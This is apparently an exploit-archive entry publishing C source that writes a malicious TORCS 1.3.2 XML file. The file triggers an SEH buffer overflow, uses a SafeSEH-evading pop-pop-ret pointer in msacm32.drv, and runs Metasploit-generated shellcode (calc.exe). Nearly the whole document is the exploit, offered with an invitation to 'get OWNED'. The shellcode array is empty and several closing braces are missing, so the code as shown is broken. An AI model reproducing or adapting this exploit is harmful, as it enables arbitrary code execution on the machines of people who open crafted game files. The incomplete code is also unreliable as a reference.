TORCS <= 1.3.2 xml buffer overflow /SAFESEH evasion

Author: Mighty-D Published: 2012-02-09 Verified: Verified



/* Exploit Title: TORCS <= 1.3.2 buffer overflow /SAFESEH evasion
# Date: 07/02/2012
# Discovered and exploited by: Fluidsignal Group -> Research Team Division
# Author:   Andres Gomez and David Mora (a.k.a Mighty-D) ... Pwn and beans!
# Software Link:
# Version: torcs 1.3.2
# Vendor notified: 03/02/2012
# Tested on: Windows XP Service Pack 3 Spanish
# CVE : */
/* This program will generate the exploit and append it to template.xml, thereof it is
   very important that this file exists in the file folder the program is beeing run.
   Afther the poc is run, you must load template.xml on TORCS and get OWNED! */
#include <stdio.h>
#include <stdlib.h>
   Shellcode: msfpayload windows/exec CMD=calc.exe R | msfencode register=ebp -e x86/alpha_mixed -t c
unsigned char shellcode[] =
unsigned char stage[] = "\x55\x58\x35\x41\x41\x41\x75\x35\x69\x4A\x41\x75\x50\x5D";// ebp = &shellcode
unsigned char seh_pointer [] = "\x4E\x20\xC9\x72"; // seh pointer pop pop ret; no safeseh on msacm32.drv
unsigned char short_jump [] = "\xEB\x20\x41\x41"; // short jump;
int main(int argc, char **argv) {
    FILE *save_fd;
    int i=0;
    save_fd = fopen("template.xml", "a+");
    if (save_fd == NULL) {
     printf("Failed to open '%s' for writing", "template.xml");
     return -1;
    fprintf(save_fd, "<section name=\"Sound\">\n"
       "<attstr name=\"engine sample\" val=\"");
    for(i=0; i < 1529; i++) {
     putc('\x41', save_fd);
    fprintf(save_fd, "%s", short_jump);
    fprintf(save_fd, "%s", seh_pointer);
    for(i=0; i < 0x22; i++) {
     putc('\x41', save_fd);
    fprintf(save_fd, "%s", stage);
    for(i=0; i < 8; i++) {
     putc('\x41', save_fd);
    fprintf(save_fd, "%s", shellcode);
    fprintf(save_fd, "\"/>\n");
    fprintf(save_fd, "<attnum name=\"rpm scale\" val=\"0.35\"/>\n");
    fprintf(save_fd, "</section>\n");
    fprintf(save_fd, "</params>\n");
    return 0;